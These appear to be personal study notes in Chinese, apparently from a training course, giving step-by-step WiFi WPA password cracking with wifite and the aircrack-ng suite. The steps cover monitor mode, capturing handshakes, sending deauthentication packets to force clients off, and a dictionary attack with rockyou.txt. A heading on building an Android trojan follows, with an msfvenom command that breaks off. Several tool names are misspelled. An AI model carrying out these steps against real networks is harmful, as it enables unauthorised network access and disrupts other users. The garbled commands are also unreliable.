一、虚拟机-可移动设备-Ralink(网上)-连接
二、lsusb查看确认,iwconfig,查看外围网卡(可能会显示wlan0)
一、自动化工具wiftte
(1)启动wifite
(2)出现热点列表
(3)ctrl+ c 停止,选择指定的热点序号
(4)以下就是自动化抓握手包(会在当前目录下/hs/下产生一个.cap包)
(5)/usr/share/wordlists/目录下有一个字典文件,rockyou.txt.gz,在kali里面以图形化界面(computer),解压出来(右键)。(班组时,提示使用该密码,个人时,不一定)。
(6)airdump -w 1.txt /root/hs/x.cap(注意路径)
字典文件另外可以通过工具直接生成,或者使用kali中自带的crunch。
https://www.cnblogs.com/student-programmer/p/6729101.html
二、手工破解
1.airmon-ng start wlan0(启动为monitor模式)
再用iwconfig查看,wlan0会变成wlan0mon
2.airodump-ng wlan0mon
开始搜索所有热点
3.发现指定AP的SSID
4.另开一个窗口,用airodump-ng -c 1(指定AP所在信道CH)- - bssid wlan0mon
5.再另开一个窗口,用aireply-ng -0 5 -a 00:14…. –c 11:22….. wlan0mon
(-0:是数字0,不是字母o,-a:是AP的SSID,-c:是客户机的MAC)
6.发现5中的窗口右上角,出现shakehand (抓到握手包)
7. airdump -w 1.txt /root/hs/x.cap(注意路径)
8.暴出密码。
9.本机连接wifi。
三、手机木马生成
一、msfvenom -p android/m